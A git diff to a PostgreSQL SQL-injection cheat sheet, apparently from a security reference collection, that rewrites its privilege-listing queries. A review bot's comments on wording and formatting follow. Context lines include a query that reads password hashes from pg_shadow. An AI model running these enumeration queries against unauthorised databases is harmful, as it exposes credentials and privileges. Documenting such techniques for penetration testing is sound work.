diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 845655e..d53196c 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -76,9 +76,14 @@ SELECT usename, passwd FROM pg_shadow SELECT usename FROM pg_user WHERE usesuper IS TRUE ``` ## PostgreSQL List Privileges - +Gather information from the [`pg_user`](https://www.postgresql.org/docs/current/view-pg-user.html) table: ```sql -SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user +SELECT * FROM pg_user +``` + +Retrieve all table-level privileges for the current user, excluding tables in system schemas like `pg_catalog` and `information_schema`: +```sql +SELECT * FROM information_schema.role_table_grants WHERE grantee = current_user AND table_schema NOT IN ('pg_catalog', 'information_schema'); ``` ## PostgreSQL Check if Current User is Superuser @@ -277,4 +282,4 @@ SELECT $TAG$This is another string$TAG$ - [Postgres SQL Injection Cheat Sheet - @pentestmonkey - August 23, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet) - [PostgreSQL 9.x Remote Command Execution - dionach - October 26, 2017](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/) - [SQL Injection /webApp/oma_conf ctx parameter - Sergey Bobrov (bobrov) - December 8, 2016](https://hackerone.com/reports/181803) -- [SQL Injection and Postgres - An Adventure to Eventual RCE - Denis Andzakovic - May 5, 2020](https://pulsesecurity.co.nz/articles/postgres-sqli) \ No newline at end of file +- [SQL Injection and Postgres - An Adventure to Eventual RCE - Denis Andzakovic - May 5, 2020](https://pulsesecurity.co.nz/articles/postgres-sqli)
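Review bot: In the `## PostgreSQL List Privileges` hunk, the new lead-in calls `pg_user` a "table", but the page it links to is `view-pg-user.html`, so the sentence should say "view". Replacing the explicit column list with `SELECT * FROM pg_user` also removes the only place where the section named the privilege columns (`usecreatedb`, `usesuper`, `usecatupd`); consider naming the relevant columns in the lead-in so the section still says what to look at. Two style points in the same hunk: the blank line after the heading is deleted, and both new paragraphs run straight into their ```` ```sql ```` fence, so please keep a blank line after the heading and before each fence. The `role_table_grants` query ends with `;` while the other queries visible in this hunk do not, so drop it for consistency.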